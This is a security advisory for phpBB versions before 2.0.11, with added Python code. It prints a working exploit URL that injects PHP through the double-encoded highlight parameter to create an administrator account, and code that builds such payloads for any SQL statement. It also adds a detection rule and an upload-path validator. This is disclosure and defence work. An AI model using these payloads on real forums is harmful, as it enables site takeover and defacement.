phpbb2011.txt

11 Dec 2004 00:00:00 | Reported by Zeelock | Type: packetstorm | Source: packetstormsecurity.com

phpBB releases before 2.0.11 let an unauthenticated visitor execute PHP through the highlight parameter of viewtopic.php. The parameter is URL-decoded once by the web server and a second time by phpBB itself, so a double-encoded quote (%2527) only turns into a literal quote after phpBB's input filtering has already run; the decoded value ends up inside a preg_replace() call that uses the /e modifier, so everything after that quote is evaluated as PHP code. The advisory below uses that to run an arbitrary INSERT through mysql_query(), spelling the SQL out with chr() calls so the payload contains no quote characters of its own. The attachment module has a separate directory traversal in its UPLOAD_DIR setting.

Code
`phpBB: all versions before 2.0.11 are vulnerable
Attachment module: all versions are vulnerable
  
Howdark's update opened my eyes with his nice exploit:
  
Bugtraq id: 10701   
  
-----  
viewtopic.php?t=1&highlight=%2527  
-----   
  
Looking at the code, I saw that it was possible to inject any type of SQL query
using multiple chr() functions.
  
The following code adds a username with admin rights by executing this query
(user_level 1 is the administrator level in phpBB 2):
  
INSERT INTO   
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES   
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')   
  
This adds a new user with admin rights to phpbb_users.
  
*Note: we can only execute a working query if we know the table name. If not,
we can't. So this works only with a standard installation (usually 95% of
websites ;-)
  
username: ze3lock  
pass: thepass   
  
The exploit can be run without being logged in, after which you can log in
with that username. So it is quite simple to make it part of a script that
plants backdoors across the web.
  
To make it work, just use the id of an existing thread (in this case the
thread is 30, the t=30 in the URL).
  
--- Code start ----   
  
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
  
--- code end ---   
  
------------ Attach Module ----------------   
  
  
In the attach module, I found a directory traversal in the "UPLOAD_DIR"   
field.   
  
This is the directory where all attachments are supposed to be uploaded.
  
The field accepts any kind of character, so instead of 'files' you can enter
'../../' and all attachments will be uploaded into the '../../' directory,
outside the attachment tree. The setting lives in the administration panel,
so by itself it needs an administrator account; chained with the account
created above, it turns attachment upload into a file write wherever the
setting points.
  
That is a real defacement risk.
  
  
--------------- Suggestion ------------------   
  
Please upgrade to version 2.0.11 and add input validation to the UPLOAD_DIR
field in the attach module.
  
Zeelock   
  
`
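The following Python script is an added example, not part of Zeelock's advisory or of phpBB, that works the highlight encoding in both directions. It joins the advisory's wrapped exploit URL back into one string, strips the two layers of URL encoding the way the web server and then phpBB's own urldecode() would, and recovers the SQL statement from the chr() chain; it then rebuilds the same URL from that SQL, which shows why the payload needs no quote characters of its own. A small log-review rule for the double-encoded quote is included. The site name, thread id and SQL are the advisory's; the function names are mine.

```python
import re
from urllib.parse import unquote

# The advisory's exploit URL, joined back together from the wrapped lines of
# the original text (site name and thread id are the advisory's placeholders).
ADVISORY_URL = (
    "http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr"
    "(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)"
    "%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25"
    "2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252"
    "echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25"
    "2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2"
    "52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2"
    "52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2"
    "52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%"
    "252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%"
    "252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%"
    "252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)"
    "%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108"
    ")%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32"
    ")%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25"
    "2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech"
    "r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39"
    ")%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)"
    "%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2"
    "52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec"
    "hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr"
    "(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98"
    ")%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25"
    "2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec"
    "hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr("
    "41))%252e%2527"
)

# The statement the advisory says the payload executes.
ADVISORY_SQL = (
    "INSERT INTO phpbb_users(user_id,user_active,username,user_password,"
    "user_level) VALUES ('99999','1','ze3lock',"
    "'ba3c83348bddf7b368b478ac06d3340e','1')"
)

CHR_CALL = re.compile(r"chr\((\d{1,3})\)")
HIGHLIGHT_PARAM = re.compile(r"[?&]highlight=([^&\s\"]+)")


def raw_highlight(url):
    """Return the highlight parameter exactly as sent (still encoded), or ''."""
    m = HIGHLIGHT_PARAM.search(url)
    return m.group(1) if m else ""


def decode_highlight(value):
    """Undo both decoding rounds and recover the SQL from the chr() chain.

    Round one is what the web server does to every request (%2527 -> %27);
    round two is phpBB 2.0.10's own urldecode() of the parameter (%27 -> ').
    The quote only exists after round two, so filtering applied to the
    once-decoded value never saw it.  Returns (php_fragment, sql).
    """
    php = unquote(unquote(value))
    sql = "".join(chr(int(n)) for n in CHR_CALL.findall(php))
    return php, sql


def encode_highlight(sql):
    """Rebuild the double-encoded highlight value for an SQL statement.

    Every byte is emitted as chr(N) and the calls are joined with '.', so the
    PHP expression contains no quote characters; the only quotes are the two
    %2527 that close and reopen the string inside the /e preg_replace() call.
    """
    chain = "%252e".join("chr(%d)" % b for b in sql.encode("ascii"))
    return "%2527%252emysql_query(" + chain + ")%252e%2527"


def exploit_url(base, topic_id, sql):
    """Full request URL for a viewtopic.php base and an existing thread id."""
    return "%s?t=%d&highlight=%s" % (base, topic_id, encode_highlight(sql))


def is_highlight_injection(url):
    """Log-review rule: the forum's own search links single-encode the term,
    so a double-encoded quote in highlight is a strong sign of this exploit
    (a user searching for the literal text %27 is the rare false positive)."""
    return "%2527" in raw_highlight(url).lower()
```

raw_highlight() works on a bare URL or on the request field of an access-log line, and it deliberately returns the parameter undecoded so that decode_highlight() sees exactly what the server saw.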

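As an added example (not from the advisory or the attachment mod, and in Python rather than the mod's PHP), here is the kind of containment check the suggestion asks for: a proposed UPLOAD_DIR value is accepted only if it is a plain relative name with no '.' or '..' components and, after symlinks are resolved, still lies under the forum root. The forum tree built in demo() is constructed for the example; the function names are mine.

```python
import os
import tempfile
from pathlib import Path


def validate_upload_dir(forum_root, value):
    """Return the resolved attachment directory for a proposed UPLOAD_DIR
    value, or raise ValueError if it would leave forum_root.

    Lexical checks first (no empty or padded value, no backslash or NUL, no
    absolute path, no '.' or '..' component), then a physical check: resolve
    symlinks and confirm the result is forum_root or below it, so a symlink
    planted inside the forum tree cannot slip past the lexical test.
    """
    if not value or value != value.strip():
        raise ValueError("empty or padded value")
    if "\\" in value or "\x00" in value:
        raise ValueError("forbidden character")
    if os.path.isabs(value):
        raise ValueError("absolute path")
    if any(part in (".", "..") for part in Path(value).parts):
        raise ValueError("traversal component")
    root = Path(forum_root).resolve()
    target = (root / value).resolve()
    if target != root and root not in target.parents:
        raise ValueError("resolves outside the forum root")
    return target


def classify(forum_root, values):
    """Map each candidate setting to 'ok' or 'rejected: <reason>'."""
    result = {}
    for value in values:
        try:
            validate_upload_dir(forum_root, value)
            result[value] = "ok"
        except ValueError as err:
            result[value] = "rejected: %s" % err
    return result


def demo():
    """Run the advisory's '../../' case and the edge cases against a
    throwaway forum tree (constructed here; not a real phpBB install)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "forum"
        (root / "files").mkdir(parents=True)
        outside = Path(tmp) / "outside"
        outside.mkdir()
        cases = ["files", "files/2004", "../../", "files/../../",
                 "/tmp", "..\\..\\", ""]
        try:
            # A symlink inside the web root pointing out of it: lexically
            # clean, physically an escape.
            os.symlink(outside, root / "escape")
            cases.append("escape/uploads")
        except OSError:
            pass
        return classify(root, cases)
```

The two checks are independent on purpose: the lexical one gives a clear error message for the attacker-typed '../../', and the resolve() step catches what the lexical one cannot see, such as a symlink an attacker managed to create under the forum root.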